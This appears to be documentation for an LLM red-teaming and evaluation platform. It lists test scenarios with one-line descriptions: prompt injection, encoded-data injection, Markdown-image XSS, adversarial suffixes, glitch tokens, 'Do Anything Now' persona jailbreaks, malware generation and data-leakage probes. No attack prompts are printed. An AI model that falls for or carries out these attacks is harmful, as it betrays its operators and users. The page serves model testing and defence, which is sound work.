Scenarios

Scenarios are groups of related Probes. Each Scenario is its own Harness, but multiple Scenarios can also be composed to form other Harnesses.

Ethical Theories

Ethical Theories Scenario includes both vanilla and jailbreaking Probes for prompts that test the model’s understanding of ethical theories.

Ethics Simulation

Ethics Simulation Scenario contains vanilla and jailbreaking prompts that ask about the moral valence of a simulated Scenario.

Copyrighted Content

Copyrighted Data Leakage Scenario contains prompts that attempt to get the model to repeat copyrighted content from books and newspapers.

Private Data Leakage

Private Data Leakage Scenario contains prompts that test whether a model will leak private data.

Adversarial GLUE

Adversarial GLUE Scenario currently makes up the entirety of the Robustness Harness. The Scenario measures whether the model’s performance on the natural language understanding tasks in GLUE is affected by perturbations to the sentences in the tasks.

Professional Bias

Professional Bias Scenario measures whether the model associates gender with occupations.

Gender-income Bias

Gender-income Bias Scenario checks whether the model predicts a person’s income in a gender-biased manner.

Stereotype

The Stereotype Scenario is currently made up from the entire Stereotype Harness. The Scenario measures whether the model reinforces stereotypes about religion, race, ethnicity, age, disability, national origin, and gender in its responses.

Compounding Hallucination

Compounding Hallucination Scenario attempts to prompt the model into generating hallucinations by having it over-commit to an initial mistake.

Misleading Information

Misleading Information Scenario checks whether the model is able to refute false assertions presented in the input prompt.

Package Hallucination

Package Hallucination Scenario contains prompts designed to elicit sample code importing non-existent Python packages.

Hallucination: Goodside

Hallucination: Goodside Scenario consists of Who is Riley? and Davidjl Probes. They were designed by Riley Goodside to elicit hallucinations. Social Values Scenario currently consists of a Probe looking for promotions of quack medicine.

Known Malware

Known Malware Scenario checks for the existence of known signatures of spam and viruses in the output.

Malware Generation

Malware Generation Scenario contains Probes that attempt to make the model generate malware.

Prompt Injection

Prompt Injection Scenario consists of prompt injections that attempt to trick the model into producing specific strings.

Prompt Injection: Encoded Data

Prompt Injection: Encoded Data tests whether a model will decode encoded strings injected into the prompt.

Cross-site Scripting (XSS)

Cross-site Scripting (XSS) Scenario aims to get the model to produce a cross-site scripting content in a Markdown image.

Adversarial Suffix

Adversarial Suffix Scenario uses adversarial suffixes to elicit instructions on how to steal from a non-profit organization.

Glitch

Glitch Scenario contains prompts that use glitch tokens to disrupt expected model behavior.

Do Anything Now

Do Anything Now Scenario attempt to get the model to escape its Guardrails by prompting it to take on a special persona.

Slur Continuation

Slur Continuation Scenario tests whether a model will continue a slur when provided with leading text.

Ethical Harms

Ethical Harms Scenario checks for ethical harms in the model’s output, such as bullying, deadnaming, profanity, sexual content, and slurs.

Real Toxicity Prompts

Real Toxicity Prompts Scenario contains input text, taken from web data, that are toxic if completed.

Scenario ID	Name	Description
vijil.scenarios.reliability_robustness_distributionalrobustness	Distributional Robustness	Tests sensitivity to prompt alterations that aim to create out-of-distribution inputs.
vijil.scenarios.security_confidentiality_dataprivacy	Data Privacy	Tests for leakage of training data.
vijil.scenarios.safety_compliance_normcompliance	Norm Compliance	Tests for offensive or culturally insensitive outputs.
vijil.scenarios.security_integrity_manipulationresistance	Manipulation Resistance	Tests for agent’s resistance to manipulative inputs.
vijil.scenarios.reliability_correctness_factualaccuracy	Factual Accuracy	Tests for hallucinations or misinformation.
vijil.scenarios.reliability_correctness_logicalvalidity	Logical Validity	Tests for agent’s tendency to make errors in deductive logic.
vijil.scenarios.safety_compliance_policycompliance	Policy Compliance	Tests for adherence to common organizational guidelines and policies.
vijil.scenarios.safety_compliance_ethicalbehavior	Ethical Behavior	Tests for whether the agent can produce unethical outputs.
vijil.scenarios.reliability_robustness_contextualrobustness	Contextual Robustness	Tests for whether the agent is robust against noisy inputs.
vijil.scenarios.security_confidentiality_userprivacy	User Privacy	Tests whether the agent exposes end-user PII.
vijil.scenarios.security_confidentiality_modelprivacy	Model Privacy	Tests whether the agent leaks private model information.
vijil.scenarios.integrity	integrity	Test the agent’s ability to prevent adherance to adversarial prompt injections
vijil.scenarios.availability	availability	Test the agent’s ability to prevent Denial-of-Service attack attempts

Overview

Trust Score

Evaluation

Runtime Defense

Reference

Ethical Theories

Ethics Simulation

Copyrighted Content

Private Data Leakage

Adversarial GLUE

Professional Bias

Gender-income Bias

Stereotype

Compounding Hallucination

Misleading Information

Package Hallucination

Hallucination: Goodside

Known Malware

Malware Generation

Prompt Injection

Prompt Injection: Encoded Data

Cross-site Scripting (XSS)

Adversarial Suffix

Glitch

Do Anything Now

Slur Continuation

Ethical Harms

Real Toxicity Prompts

​Ethical Theories

​Ethics Simulation

​Copyrighted Content

​Private Data Leakage

​Adversarial GLUE

​Professional Bias

​Gender-income Bias

​Stereotype

​Compounding Hallucination

​Misleading Information

​Package Hallucination

​Hallucination: Goodside

​Social Values

​Known Malware

​Malware Generation

​Prompt Injection

​Prompt Injection: Encoded Data

​Cross-site Scripting (XSS)

​Adversarial Suffix

​Glitch

​Do Anything Now

​Slur Continuation

​Ethical Harms

​Real Toxicity Prompts

Ethical Theories

Ethics Simulation

Copyrighted Content

Private Data Leakage

Adversarial GLUE

Professional Bias

Gender-income Bias

Stereotype

Compounding Hallucination

Misleading Information

Package Hallucination

Hallucination: Goodside

Social Values

Known Malware

Malware Generation

Prompt Injection

Prompt Injection: Encoded Data

Cross-site Scripting (XSS)

Adversarial Suffix

Glitch

Do Anything Now

Slur Continuation

Ethical Harms

Real Toxicity Prompts